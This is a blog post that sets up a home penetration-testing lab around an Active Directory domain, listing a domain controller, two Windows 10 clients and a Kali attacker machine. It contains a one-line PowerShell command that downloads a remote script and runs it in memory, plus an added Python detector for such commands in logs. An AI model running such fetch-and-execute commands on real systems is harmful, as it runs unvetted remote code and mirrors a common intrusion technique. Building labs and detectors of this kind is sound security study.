
Sunday, September 12, 2021

Active Directory CORPORATIVE.domain.local Series[I] : Environment

Hi everyone,


So far so good, but now we are going to start a new challenge that represents the most common architecture companies usually implement for corporate domain solutions.

Using the following architecture, we are going to implement and exploit the most common attack types in order to compromise a "secure organization", CORPORATIVE.DOMAIN.local:



The previous image is the base architecture for our personal penetration testing lab. In the section below you'll find the configuration of every asset in our "target company environment":

1. The full platform design is up and running on its own local NAT network. This kind of network allows the guest servers to connect to each other inside a local subnet (172.0.9.x/24) and to have internet access:




2. Configurations:

In order to obtain the basic configuration of the domain members, we are going to execute the following PowerShell script:


Execute it filelessly on your own operating system (from the internet straight into local memory), using a PowerShell terminal:

IEX (new-object Net.webclient).downloadstring('https://raw.githubusercontent.com/f0ns1/powershell-pentest/main/os-recognition.ps1')
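
What this download cradle looks like from the defender's side, as an added example that is not part of the original post: with PowerShell script block logging enabled, the command text is recorded in event ID 4104, and the Python below flags logged blocks that both fetch remote content and evaluate it. The function name `find_download_cradles` and every sample log text except the page's own command are constructed for illustration.

```python
import re

# Expression-evaluation sinks: the alias used on this page and its full cmdlet name.
EVAL = re.compile(r"(?<![\w-])(iex|invoke-expression)(?![\w-])", re.I)
# Calls that pull remote content into memory instead of writing it to disk.
FETCH = re.compile(
    r"\.download(string|data)\s*\("
    r"|(?<![\w-])(invoke-webrequest|invoke-restmethod|iwr|irm)(?![\w-])",
    re.I,
)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)

# Constructed ScriptBlockText values (event ID 4104); the first is the command from this page.
SAMPLE_BLOCKS = [
    "IEX (new-object Net.webclient).downloadstring('https://raw.githubusercontent.com/"
    "f0ns1/powershell-pentest/main/os-recognition.ps1')",
    "Invoke-WebRequest -Uri https://example.com/tool.zip -OutFile C:\\Temp\\tool.zip",
    "Get-ADUser -Filter * | Select-Object Name",
    "irm https://example.com/setup.ps1 | Invoke-Expression",
]


def find_download_cradles(script_blocks):
    """Return one finding per block that fetches remote text and evaluates it."""
    findings = []
    for index, text in enumerate(script_blocks):
        # PowerShell is case-insensitive, so both patterns are compiled with re.I.
        if EVAL.search(text) and FETCH.search(text):
            findings.append({"index": index, "urls": URL.findall(text)})
    return findings


if __name__ == "__main__":
    for finding in find_download_cradles(SAMPLE_BLOCKS):
        print(finding["index"], ", ".join(finding["urls"]))
```

A plain download to disk (the second sample) is not flagged, because nothing evaluates the fetched content in the same script block.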

2.1 Active directory: Domain controller [Windows Server 2016]




2.2 Client domain 1: [Windows 10]

    



2.3 Client domain 2:  [Windows 10]




2.4 Attacker machine: [Kali Linux]



3. Final network configuration with all machines, users and IPs




It seems that our playground is finished, and at this point we can start to hack!

And that is all for this environment configuration step. I hope that you enjoy my first Windows entry and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

With kind regards, f0ns1
